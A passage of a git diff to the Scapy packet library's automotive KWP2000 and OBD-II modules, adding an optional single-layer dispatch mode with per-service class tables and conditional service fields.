KWP_TP(Packet): } name = 'TesterPresent' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3e, KWP.services), _kwp_slm), ByteEnumField('responseRequired', 1, responseTypes) ] -bind_layers(KWP, KWP_TP, service=0x3E) +bind_layers(KWP, KWP_TP, service=0x3e) +KWP._service_cls[0x3e] = KWP_TP class KWP_TPPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7e, KWP.services), _kwp_slm), + ] name = 'TesterPresentPositiveResponse' def answers(self, other): @@ -334,7 +409,8 @@ def answers(self, other): return isinstance(other, KWP_TP) -bind_layers(KWP, KWP_TPPR, service=0x7E) +bind_layers(KWP, KWP_TPPR, service=0x7e) +KWP._service_cls[0x7e] = KWP_TPPR # ######################### KWP_CDTCS ################################### @@ -357,6 +433,7 @@ class KWP_CDTCS(Packet): } name = 'ControlDTCSetting' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x85, KWP.services), _kwp_slm), ByteEnumField('responseRequired', 1, responseTypes), XShortEnumField('groupOfDTC', 0, DTCGroups), ByteEnumField('DTCSettingMode', 0, DTCSettingModes), @@ -364,9 +441,13 @@ class KWP_CDTCS(Packet): bind_layers(KWP, KWP_CDTCS, service=0x85) +KWP._service_cls[0x85] = KWP_CDTCS class KWP_CDTCSPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc5, KWP.services), _kwp_slm), + ] name = 'ControlDTCSettingPositiveResponse' def answers(self, other): @@ -374,7 +455,8 @@ def answers(self, other): return isinstance(other, KWP_CDTCS) -bind_layers(KWP, KWP_CDTCSPR, service=0xC5) +bind_layers(KWP, KWP_CDTCSPR, service=0xc5) +KWP._service_cls[0xc5] = KWP_CDTCSPR # ######################### KWP_ROE ################################### @@ -399,6 +481,7 @@ class KWP_ROE(Packet): } name = 'ResponseOnEvent' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x86, KWP.services), _kwp_slm), ByteEnumField('responseRequired', 1, responseTypes), ByteEnumField('eventWindowTime', 0, eventWindowTimes), MayEnd(ByteEnumField('eventType', 0, eventTypes)), @@ -410,11 +493,13 @@ class KWP_ROE(Packet): bind_layers(KWP, KWP_ROE, service=0x86) +KWP._service_cls[0x86] = KWP_ROE class KWP_ROEPR(Packet): name = 'ResponseOnEventPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc6, KWP.services), _kwp_slm), ByteField("numberOfActivatedEvents", 0), MayEnd(ByteEnumField('eventWindowTime', 0, KWP_ROE.eventWindowTimes)), # XXX Is this MayEnd correct? @@ -427,7 +512,8 @@ def answers(self, other): and other.eventType == self.eventType -bind_layers(KWP, KWP_ROEPR, service=0xC6) +bind_layers(KWP, KWP_ROEPR, service=0xc6) +KWP._service_cls[0xc6] = KWP_ROEPR # ######################### KWP_RDBLI ################################### @@ -448,16 +534,19 @@ class KWP_RDBLI(Packet): }) name = 'ReadDataByLocalIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x21, KWP.services), _kwp_slm), XByteEnumField('recordLocalIdentifier', 0, localIdentifiers) ] bind_layers(KWP, KWP_RDBLI, service=0x21) +KWP._service_cls[0x21] = KWP_RDBLI class KWP_RDBLIPR(Packet): name = 'ReadDataByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x61, KWP.services), _kwp_slm), XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) ] @@ -468,22 +557,26 @@ def answers(self, other): bind_layers(KWP, KWP_RDBLIPR, service=0x61) +KWP._service_cls[0x61] = KWP_RDBLIPR # ######################### KWP_WDBLI ################################### class KWP_WDBLI(Packet): name = 'WriteDataByLocalIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3b, KWP.services), _kwp_slm), XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) ] -bind_layers(KWP, KWP_WDBLI, service=0x3B) +bind_layers(KWP, KWP_WDBLI, service=0x3b) +KWP._service_cls[0x3b] = KWP_WDBLI class KWP_WDBLIPR(Packet): name = 'WriteDataByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7b, KWP.services), _kwp_slm), XByteEnumField('recordLocalIdentifier', 0, KWP_RDBLI.localIdentifiers) ] @@ -493,7 +586,8 @@ def answers(self, other): and self.recordLocalIdentifier == other.recordLocalIdentifier -bind_layers(KWP, KWP_WDBLIPR, service=0x7B) +bind_layers(KWP, KWP_WDBLIPR, service=0x7b) +KWP._service_cls[0x7b] = KWP_WDBLIPR # ######################### KWP_RDBI ################################### @@ -501,16 +595,19 @@ class KWP_RDBI(Packet): dataIdentifiers = ObservableDict() name = 'ReadDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x22, KWP.services), _kwp_slm), XShortEnumField('identifier', 0, dataIdentifiers) ] bind_layers(KWP, KWP_RDBI, service=0x22) +KWP._service_cls[0x22] = KWP_RDBI class KWP_RDBIPR(Packet): name = 'ReadDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x62, KWP.services), _kwp_slm), XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers), ] @@ -521,23 +618,27 @@ def answers(self, other): bind_layers(KWP, KWP_RDBIPR, service=0x62) +KWP._service_cls[0x62] = KWP_RDBIPR # ######################### KWP_RMBA ################################### class KWP_RMBA(Packet): name = 'ReadMemoryByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x23, KWP.services), _kwp_slm), X3BytesField('memoryAddress', 0), ByteField('memorySize', 0) ] bind_layers(KWP, KWP_RMBA, service=0x23) +KWP._service_cls[0x23] = KWP_RMBA class KWP_RMBAPR(Packet): name = 'ReadMemoryByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x63, KWP.services), _kwp_slm), StrField('dataRecord', b"", fmt="B") ] @@ -547,6 +648,7 @@ def answers(self, other): bind_layers(KWP, KWP_RMBAPR, service=0x63) +KWP._service_cls[0x63] = KWP_RMBAPR # ######################### KWP_DDLI ################################### @@ -559,18 +661,21 @@ class KWP_DDLI(Packet): 0x3: "defineByIdentifier", 0x4: "clearDynamicallyDefinedLocalIdentifier"} fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2c, KWP.services), _kwp_slm), XByteField('dynamicallyDefineLocalIdentifier', 0), ByteEnumField('definitionMode', 0, definitionModes), StrField('dataRecord', b"", fmt="B") ] -bind_layers(KWP, KWP_DDLI, service=0x2C) +bind_layers(KWP, KWP_DDLI, service=0x2c) +KWP._service_cls[0x2c] = KWP_DDLI class KWP_DDLIPR(Packet): name = 'DynamicallyDefineLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6c, KWP.services), _kwp_slm), XByteField('dynamicallyDefineLocalIdentifier', 0) ] @@ -580,23 +685,27 @@ def answers(self, other): other.dynamicallyDefineLocalIdentifier == self.dynamicallyDefineLocalIdentifier # noqa: E501 -bind_layers(KWP, KWP_DDLIPR, service=0x6C) +bind_layers(KWP, KWP_DDLIPR, service=0x6c) +KWP._service_cls[0x6c] = KWP_DDLIPR # ######################### KWP_WDBI ################################### class KWP_WDBI(Packet): name = 'WriteDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2e, KWP.services), _kwp_slm), XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers) ] -bind_layers(KWP, KWP_WDBI, service=0x2E) +bind_layers(KWP, KWP_WDBI, service=0x2e) +KWP._service_cls[0x2e] = KWP_WDBI class KWP_WDBIPR(Packet): name = 'WriteDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6e, KWP.services), _kwp_slm), XShortEnumField('identifier', 0, KWP_RDBI.dataIdentifiers), ] @@ -606,25 +715,29 @@ def answers(self, other): and other.identifier == self.identifier -bind_layers(KWP, KWP_WDBIPR, service=0x6E) +bind_layers(KWP, KWP_WDBIPR, service=0x6e) +KWP._service_cls[0x6e] = KWP_WDBIPR # ######################### KWP_WMBA ################################### class KWP_WMBA(Packet): name = 'WriteMemoryByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3d, KWP.services), _kwp_slm), X3BytesField('memoryAddress', 0), ByteField('memorySize', 0), StrField('dataRecord', b'', fmt="B") ] -bind_layers(KWP, KWP_WMBA, service=0x3D) +bind_layers(KWP, KWP_WMBA, service=0x3d) +KWP._service_cls[0x3d] = KWP_WMBA class KWP_WMBAPR(Packet): name = 'WriteMemoryByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7d, KWP.services), _kwp_slm), X3BytesField('memoryAddress', 0) ] @@ -634,7 +747,8 @@ def answers(self, other): other.memoryAddress == self.memoryAddress -bind_layers(KWP, KWP_WMBAPR, service=0x7D) +bind_layers(KWP, KWP_WMBAPR, service=0x7d) +KWP._service_cls[0x7d] = KWP_WMBAPR # ######################### KWP_CDI ################################### @@ -648,17 +762,20 @@ class KWP_CDI(Packet): } name = 'ClearDiagnosticInformation' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x14, KWP.services), _kwp_slm), XShortEnumField('groupOfDTC', 0, DTCGroups) ] bind_layers(KWP, KWP_CDI, service=0x14) +KWP._service_cls[0x14] = KWP_CDI class KWP_CDIPR(Packet): name = 'ClearDiagnosticInformationPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x54, KWP.services), _kwp_slm), XShortEnumField('groupOfDTC', 0, KWP_CDI.DTCGroups) ] @@ -669,23 +786,27 @@ def answers(self, other): bind_layers(KWP, KWP_CDIPR, service=0x54) +KWP._service_cls[0x54] = KWP_CDIPR # ######################### KWP_RSODTC ################################### class KWP_RSODTC(Packet): name = 'ReadStatusOfDiagnosticTroubleCodes' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x17, KWP.services), _kwp_slm), XShortEnumField('groupOfDTC', 0, KWP_CDI.DTCGroups) ] bind_layers(KWP, KWP_RSODTC, service=0x17) +KWP._service_cls[0x17] = KWP_RSODTC class KWP_RSODTCPR(Packet): name = 'ReadStatusOfDiagnosticTroubleCodesPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x57, KWP.services), _kwp_slm), ByteField('numberOfDTC', 0), ] @@ -695,6 +816,7 @@ def answers(self, other): bind_layers(KWP, KWP_RSODTCPR, service=0x57) +KWP._service_cls[0x57] = KWP_RSODTCPR # ######################### KWP_RECUI ################################### @@ -716,17 +838,20 @@ class KWP_RECUI(Packet): 0x9F: "ECU Boot Fingerprint" }) fields_desc = [ + ConditionalField(XByteEnumField('service', 0x1a, KWP.services), _kwp_slm), XByteEnumField('localIdentifier', 0, localIdentifiers) ] -bind_layers(KWP, KWP_RECUI, service=0x1A) +bind_layers(KWP, KWP_RECUI, service=0x1a) +KWP._service_cls[0x1a] = KWP_RECUI class KWP_RECUIPR(Packet): name = 'ReadECUIdentificationPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x5a, KWP.services), _kwp_slm), XByteEnumField('localIdentifier', 0, KWP_RECUI.localIdentifiers) ] @@ -736,7 +861,8 @@ def answers(self, other): self.localIdentifier == other.localIdentifier -bind_layers(KWP, KWP_RECUIPR, service=0x5A) +bind_layers(KWP, KWP_RECUIPR, service=0x5a) +KWP._service_cls[0x5a] = KWP_RECUIPR # ######################### KWP_SRBLI ################################### @@ -755,16 +881,19 @@ class KWP_SRBLI(Packet): }) name = 'StartRoutineByLocalIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x31, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, routineLocalIdentifiers) ] bind_layers(KWP, KWP_SRBLI, service=0x31) +KWP._service_cls[0x31] = KWP_SRBLI class KWP_SRBLIPR(Packet): name = 'StartRoutineByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x71, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, KWP_SRBLI.routineLocalIdentifiers) ] @@ -776,23 +905,27 @@ def answers(self, other): bind_layers(KWP, KWP_SRBLIPR, service=0x71) +KWP._service_cls[0x71] = KWP_SRBLIPR # ######################### KWP_STRBLI ################################### class KWP_STRBLI(Packet): name = 'StopRoutineByLocalIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x32, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, KWP_SRBLI.routineLocalIdentifiers) ] bind_layers(KWP, KWP_STRBLI, service=0x32) +KWP._service_cls[0x32] = KWP_STRBLI class KWP_STRBLIPR(Packet): name = 'StopRoutineByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x72, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, KWP_SRBLI.routineLocalIdentifiers) ] @@ -804,23 +937,27 @@ def answers(self, other): bind_layers(KWP, KWP_STRBLIPR, service=0x72) +KWP._service_cls[0x72] = KWP_STRBLIPR # ######################### KWP_RRRBLI ################################### class KWP_RRRBLI(Packet): name = 'RequestRoutineResultsByLocalIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x33, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, KWP_SRBLI.routineLocalIdentifiers) ] bind_layers(KWP, KWP_RRRBLI, service=0x33) +KWP._service_cls[0x33] = KWP_RRRBLI class KWP_RRRBLIPR(Packet): name = 'RequestRoutineResultsByLocalIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x73, KWP.services), _kwp_slm), XByteEnumField('routineLocalIdentifier', 0, KWP_SRBLI.routineLocalIdentifiers) ] @@ -832,12 +969,14 @@ def answers(self, other): bind_layers(KWP, KWP_RRRBLIPR, service=0x73) +KWP._service_cls[0x73] = KWP_RRRBLIPR # ######################### KWP_RD ################################### class KWP_RD(Packet): name = 'RequestDownload' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x34, KWP.services), _kwp_slm), X3BytesField('memoryAddress', 0), BitField('compression', 0, 4), BitField('encryption', 0, 4), @@ -846,11 +985,13 @@ class KWP_RD(Packet): bind_layers(KWP, KWP_RD, service=0x34) +KWP._service_cls[0x34] = KWP_RD class KWP_RDPR(Packet): name = 'RequestDownloadPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x74, KWP.services), _kwp_slm), StrField('maxNumberOfBlockLength', b"", fmt="B"), ] @@ -860,12 +1001,14 @@ def answers(self, other): bind_layers(KWP, KWP_RDPR, service=0x74) +KWP._service_cls[0x74] = KWP_RDPR # ######################### KWP_RU ################################### class KWP_RU(Packet): name = 'RequestUpload' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x35, KWP.services), _kwp_slm), X3BytesField('memoryAddress', 0), BitField('compression', 0, 4), BitField('encryption', 0, 4), @@ -874,11 +1017,13 @@ class KWP_RU(Packet): bind_layers(KWP, KWP_RU, service=0x35) +KWP._service_cls[0x35] = KWP_RU class KWP_RUPR(Packet): name = 'RequestUploadPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x75, KWP.services), _kwp_slm), StrField('maxNumberOfBlockLength', b"", fmt="B"), ] @@ -888,23 +1033,27 @@ def answers(self, other): bind_layers(KWP, KWP_RUPR, service=0x75) +KWP._service_cls[0x75] = KWP_RUPR # ######################### KWP_TD ################################### class KWP_TD(Packet): name = 'TransferData' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x36, KWP.services), _kwp_slm), ByteField('blockSequenceCounter', 0), StrField('transferDataRequestParameter', b"", fmt="B") ] bind_layers(KWP, KWP_TD, service=0x36) +KWP._service_cls[0x36] = KWP_TD class KWP_TDPR(Packet): name = 'TransferDataPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x76, KWP.services), _kwp_slm), ByteField('blockSequenceCounter', 0), StrField('transferDataRequestParameter', b"", fmt="B") ] @@ -916,22 +1065,26 @@ def answers(self, other): bind_layers(KWP, KWP_TDPR, service=0x76) +KWP._service_cls[0x76] = KWP_TDPR # ######################### KWP_RTE ################################### class KWP_RTE(Packet): name = 'RequestTransferExit' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x37, KWP.services), _kwp_slm), StrField('transferDataRequestParameter', b"", fmt="B") ] bind_layers(KWP, KWP_RTE, service=0x37) +KWP._service_cls[0x37] = KWP_RTE class KWP_RTEPR(Packet): name = 'RequestTransferExitPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x77, KWP.services), _kwp_slm), StrField('transferDataRequestParameter', b"", fmt="B") ] @@ -941,6 +1094,7 @@ def answers(self, other): bind_layers(KWP, KWP_RTEPR, service=0x77) +KWP._service_cls[0x77] = KWP_RTEPR # ######################### KWP_NR ################################### @@ -970,6 +1124,7 @@ class KWP_NR(Packet): } name = 'NegativeResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7f, KWP.services), _kwp_slm), MayEnd(XByteEnumField('requestServiceId', 0, KWP.services)), # XXX Is this MayEnd correct? ByteEnumField('negativeResponseCode', 0, negativeResponseCodes) @@ -983,6 +1138,7 @@ def answers(self, other): bind_layers(KWP, KWP_NR, service=0x7f) +KWP._service_cls[0x7f] = KWP_NR # ################################################################## diff --git a/scapy/contrib/automotive/obd/iid/iids.py b/scapy/contrib/automotive/obd/iid/iids.py index 908f5b66d42..5c85c2c4834 100644 --- a/scapy/contrib/automotive/obd/iid/iids.py +++ b/scapy/contrib/automotive/obd/iid/iids.py @@ -6,11 +6,14 @@ # scapy.contrib.status = skip -from scapy.fields import FieldLenField, FieldListField, StrFixedLenField, \ - ByteField, ShortField, FlagsField, XByteField, PacketListField +from scapy.fields import ( + ConditionalField, FieldLenField, FieldListField, StrFixedLenField, + ByteField, ShortField, FlagsField, XByteEnumField, XByteField, + PacketListField +) from scapy.packet import Packet, bind_layers from scapy.contrib.automotive.obd.packet import OBD_Packet -from scapy.contrib.automotive.obd.services import OBD_S09 +from scapy.contrib.automotive.obd.services import OBD_S09, _OBD_SERVICES, _obd_slm # See https://en.wikipedia.org/wiki/OBD-II_PIDs#Service_09 @@ -26,6 +29,7 @@ class OBD_S09_PR_Record(Packet): class OBD_S09_PR(Packet): name = "Infotype IDs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x49, _OBD_SERVICES), _obd_slm), PacketListField("data_records", [], OBD_S09_PR_Record) ] diff --git a/scapy/contrib/automotive/obd/mid/mids.py b/scapy/contrib/automotive/obd/mid/mids.py index 8aa6b7b5624..0acd4a4df1c 100644 --- a/scapy/contrib/automotive/obd/mid/mids.py +++ b/scapy/contrib/automotive/obd/mid/mids.py @@ -6,11 +6,14 @@ # scapy.contrib.status = skip -from scapy.fields import FlagsField, ScalingField, ByteEnumField, \ - MultipleTypeField, ShortField, ShortEnumField, PacketListField +from scapy.fields import ( + ConditionalField, FlagsField, ScalingField, ByteEnumField, + XByteEnumField, MultipleTypeField, ShortField, ShortEnumField, + PacketListField +) from scapy.packet import Packet, bind_layers from scapy.contrib.automotive.obd.packet import OBD_Packet -from scapy.contrib.automotive.obd.services import OBD_S06 +from scapy.contrib.automotive.obd.services import OBD_S06, _OBD_SERVICES, _obd_slm def _unit_and_scaling_fields(name): @@ -457,6 +460,7 @@ class OBD_S06_PR_Record(Packet): class OBD_S06_PR(Packet): name = "On-Board monitoring IDs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x46, _OBD_SERVICES), _obd_slm), PacketListField("data_records", [], OBD_S06_PR_Record) ] diff --git a/scapy/contrib/automotive/obd/obd.py b/scapy/contrib/automotive/obd/obd.py index a165935d2c3..005264f3559 100644 --- a/scapy/contrib/automotive/obd/obd.py +++ b/scapy/contrib/automotive/obd/obd.py @@ -14,10 +14,17 @@ from scapy.contrib.automotive.obd.pid.pids import * from scapy.contrib.automotive.obd.tid.tids import * from scapy.contrib.automotive.obd.services import * -from scapy.packet import bind_layers, NoPayload +from scapy.contrib.automotive.obd.services import _OBD_SERVICES +from scapy.packet import NoPayload, bind_layers from scapy.config import conf from scapy.fields import XByteEnumField from scapy.contrib.isotp import ISOTP +from scapy.compat import orb + +from typing import ( # noqa: F401 + Dict, + Type, +) try: if conf.contribs['OBD']['treat-response-pending-as-answer']: @@ -28,32 +35,13 @@ # "a negative response 'requestCorrectlyReceived-" # "ResponsePending' as answer of a request. \n" # "The default value is False.") - conf.contribs['OBD'] = {'treat-response-pending-as-answer': False} + conf.contribs['OBD'] = {'treat-response-pending-as-answer': False, + 'single_layer_mode': False, + 'compatibility_mode': True} class OBD(ISOTP): - services = { - 0x01: 'CurrentPowertrainDiagnosticDataRequest', - 0x02: 'PowertrainFreezeFrameDataRequest', - 0x03: 'EmissionRelatedDiagnosticTroubleCodesRequest', - 0x04: 'ClearResetDiagnosticTroubleCodesRequest', - 0x05: 'OxygenSensorMonitoringTestResultsRequest', - 0x06: 'OnBoardMonitoringTestResultsRequest', - 0x07: 'PendingEmissionRelatedDiagnosticTroubleCodesRequest', - 0x08: 'ControlOperationRequest', - 0x09: 'VehicleInformationRequest', - 0x0A: 'PermanentDiagnosticTroubleCodesRequest', - 0x41: 'CurrentPowertrainDiagnosticDataResponse', - 0x42: 'PowertrainFreezeFrameDataResponse', - 0x43: 'EmissionRelatedDiagnosticTroubleCodesResponse', - 0x44: 'ClearResetDiagnosticTroubleCodesResponse', - 0x45: 'OxygenSensorMonitoringTestResultsResponse', - 0x46: 'OnBoardMonitoringTestResultsResponse', - 0x47: 'PendingEmissionRelatedDiagnosticTroubleCodesResponse', - 0x48: 'ControlOperationResponse', - 0x49: 'VehicleInformationResponse', - 0x4A: 'PermanentDiagnosticTroubleCodesResponse', - 0x7f: 'NegativeResponse'} + services = _OBD_SERVICES name = "On-board diagnostics" @@ -79,26 +67,71 @@ def answers(self, other): return self.payload.answers(other.payload) return False + _service_cls = {} # type: Dict[int, Type[Packet]] + + @classmethod + def dispatch_hook(cls, _pkt=b"", *args, **kwargs): + # type: (...) -> type + """Dispatch to the correct OBD service class in single layer mode.""" + if conf.contribs['OBD'].get('single_layer_mode', False) and len(_pkt) >= 1: + service = orb(_pkt[0]) + return cls._service_cls.get(service, cls) + return cls -# Service Bindings bind_layers(OBD, OBD_S01, service=0x01) +OBD._service_cls[0x01] = OBD_S01 + bind_layers(OBD, OBD_S02, service=0x02) +OBD._service_cls[0x02] = OBD_S02 + bind_layers(OBD, OBD_S03, service=0x03) +OBD._service_cls[0x03] = OBD_S03 + bind_layers(OBD, OBD_S04, service=0x04) +OBD._service_cls[0x04] = OBD_S04 + bind_layers(OBD, OBD_S06, service=0x06) +OBD._service_cls[0x06] = OBD_S06 + bind_layers(OBD, OBD_S07, service=0x07) +OBD._service_cls[0x07] = OBD_S07 + bind_layers(OBD, OBD_S08, service=0x08) +OBD._service_cls[0x08] = OBD_S08 + bind_layers(OBD, OBD_S09, service=0x09) +OBD._service_cls[0x09] = OBD_S09 + bind_layers(OBD, OBD_S0A, service=0x0A) +OBD._service_cls[0x0A] = OBD_S0A bind_layers(OBD, OBD_S01_PR, service=0x41) +OBD._service_cls[0x41] = OBD_S01_PR + bind_layers(OBD, OBD_S02_PR, service=0x42) +OBD._service_cls[0x42] = OBD_S02_PR + bind_layers(OBD, OBD_S03_PR, service=0x43) +OBD._service_cls[0x43] = OBD_S03_PR + bind_layers(OBD, OBD_S04_PR, service=0x44) +OBD._service_cls[0x44] = OBD_S04_PR + bind_layers(OBD, OBD_S06_PR, service=0x46) +OBD._service_cls[0x46] = OBD_S06_PR + bind_layers(OBD, OBD_S07_PR, service=0x47) +OBD._service_cls[0x47] = OBD_S07_PR + bind_layers(OBD, OBD_S08_PR, service=0x48) +OBD._service_cls[0x48] = OBD_S08_PR + bind_layers(OBD, OBD_S09_PR, service=0x49) +OBD._service_cls[0x49] = OBD_S09_PR + bind_layers(OBD, OBD_S0A_PR, service=0x4A) +OBD._service_cls[0x4A] = OBD_S0A_PR + bind_layers(OBD, OBD_NR, service=0x7F) +OBD._service_cls[0x7F] = OBD_NR diff --git a/scapy/contrib/automotive/obd/pid/pids.py b/scapy/contrib/automotive/obd/pid/pids.py index 6367ef1caa5..9ae039a52e1 100644 --- a/scapy/contrib/automotive/obd/pid/pids.py +++ b/scapy/contrib/automotive/obd/pid/pids.py @@ -7,9 +7,11 @@ # scapy.contrib.status = skip from scapy.packet import Packet, bind_layers -from scapy.fields import PacketListField +from scapy.fields import ConditionalField, PacketListField, XByteEnumField -from scapy.contrib.automotive.obd.services import OBD_S01, OBD_S02 +from scapy.contrib.automotive.obd.services import ( + OBD_S01, OBD_S02, _OBD_SERVICES, _obd_slm +) from scapy.contrib.automotive.obd.pid.pids_00_1F import * from scapy.contrib.automotive.obd.pid.pids_20_3F import * from scapy.contrib.automotive.obd.pid.pids_40_5F import * @@ -27,6 +29,7 @@ class OBD_S01_PR_Record(Packet): class OBD_S01_PR(Packet): name = "Parameter IDs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x41, _OBD_SERVICES), _obd_slm), PacketListField("data_records", [], OBD_S01_PR_Record) ] @@ -45,6 +48,7 @@ class OBD_S02_PR_Record(Packet): class OBD_S02_PR(Packet): name = "Parameter IDs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x42, _OBD_SERVICES), _obd_slm), PacketListField("data_records", [], OBD_S02_PR_Record) ] diff --git a/scapy/contrib/automotive/obd/pid/pids_00_1F.py b/scapy/contrib/automotive/obd/pid/pids_00_1F.py index 4cfc483021b..829aac6e5ec 100644 --- a/scapy/contrib/automotive/obd/pid/pids_00_1F.py +++ b/scapy/contrib/automotive/obd/pid/pids_00_1F.py @@ -19,7 +19,7 @@ class OBD_PID00(OBD_Packet): name = "PID_00_PIDsSupported" fields_desc = [ - FlagsField('supported_pids', b'', 32, [ + FlagsField('supported_pids', 0, 32, [ 'PID20', 'PID1F', 'PID1E', @@ -109,7 +109,7 @@ class OBD_PID01(OBD_Packet): class OBD_PID02(OBD_Packet): name = "PID_02_FreezeDtc" fields_desc = [ - PacketField('dtc', b'', OBD_DTC) + PacketField('dtc', None, OBD_DTC) ] @@ -250,7 +250,7 @@ class OBD_PID12(OBD_Packet): class OBD_PID13(OBD_Packet): name = "PID_13_OxygenSensorsPresent" fields_desc = [ - FlagsField('sensors_present', b'', 8, [ + FlagsField('sensors_present', 0, 8, [ 'Bank1Sensor1', 'Bank1Sensor2', 'Bank1Sensor3', diff --git a/scapy/contrib/automotive/obd/services.py b/scapy/contrib/automotive/obd/services.py index f00cf0dd519..57303bc13fb 100644 --- a/scapy/contrib/automotive/obd/services.py +++ b/scapy/contrib/automotive/obd/services.py @@ -7,11 +7,68 @@ # scapy.contrib.status = skip from scapy.fields import ByteField, XByteField, BitEnumField, \ - PacketListField, XBitField, XByteEnumField, FieldListField, FieldLenField + PacketListField, XBitField, XByteEnumField, FieldListField, \ + FieldLenField, ConditionalField from scapy.packet import Packet from scapy.contrib.automotive.obd.packet import OBD_Packet from scapy.config import conf +_OBD_SERVICES = { + 0x01: 'CurrentPowertrainDiagnosticDataRequest', + 0x02: 'PowertrainFreezeFrameDataRequest', + 0x03: 'EmissionRelatedDiagnosticTroubleCodesRequest', + 0x04: 'ClearResetDiagnosticTroubleCodesRequest', + 0x05: 'OxygenSensorMonitoringTestResultsRequest', + 0x06: 'OnBoardMonitoringTestResultsRequest', + 0x07: 'PendingEmissionRelatedDiagnosticTroubleCodesRequest', + 0x08: 'ControlOperationRequest', + 0x09: 'VehicleInformationRequest', + 0x0A: 'PermanentDiagnosticTroubleCodesRequest', + 0x41: 'CurrentPowertrainDiagnosticDataResponse', + 0x42: 'PowertrainFreezeFrameDataResponse', + 0x43: 'EmissionRelatedDiagnosticTroubleCodesResponse', + 0x44: 'ClearResetDiagnosticTroubleCodesResponse', + 0x45: 'OxygenSensorMonitoringTestResultsResponse', + 0x46: 'OnBoardMonitoringTestResultsResponse', + 0x47: 'PendingEmissionRelatedDiagnosticTroubleCodesResponse', + 0x48: 'ControlOperationResponse', + 0x49: 'VehicleInformationResponse', + 0x4A: 'PermanentDiagnosticTroubleCodesResponse', + 0x7f: 'NegativeResponse', +} + + +def _obd_slm(pkt): + # type: (Packet) -> bool + """Return True when the service ConditionalField should be present. + + Two configuration keys in ``conf.contribs['OBD']`` control the behaviour: + + ``single_layer_mode`` (bool, default ``False``): + When *True*, :class:`OBD` acts as a dispatch layer and returns the + matching service sub-packet directly. Each sub-packet gains its own + ``service`` field so that it can be built and dissected stand-alone. + + ``compatibility_mode`` (bool, default ``True``): + Only relevant when ``single_layer_mode`` is *True*. When *True* the + ``service`` field is **suppressed** in a sub-packet whose immediate + underlayer is already an :class:`OBD` packet, preventing a duplicate + service byte when sub-packets are stacked (``OBD()/OBD_S01()``). + Set to *False* to always emit the ``service`` byte from the sub-packet. + + .. note:: + OBD service classes live in ``services.py`` which is imported by + ``obd.py``. To avoid a circular import the underlayer class is + identified by its class name (``'OBD'``) rather than by an + ``isinstance`` check. + """ + if not conf.contribs['OBD'].get('single_layer_mode', False): + return False + if conf.contribs['OBD'].get('compatibility_mode', True): + ul = pkt.underlayer + return ul is None or type(ul).__name__ != 'OBD' + return True + class OBD_DTC(OBD_Packet): name = "DiagnosticTroubleCode" @@ -45,6 +102,7 @@ class OBD_NR(Packet): } fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7F, _OBD_SERVICES), _obd_slm), XByteField('request_service_id', 0), XByteEnumField('response_code', 0, responses) ] @@ -58,6 +116,7 @@ def answers(self, other): class OBD_S01(Packet): name = "S1_CurrentData" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x01, _OBD_SERVICES), _obd_slm), FieldListField("pid", [], XByteField('', 0)) ] @@ -72,17 +131,22 @@ class OBD_S02_Record(OBD_Packet): class 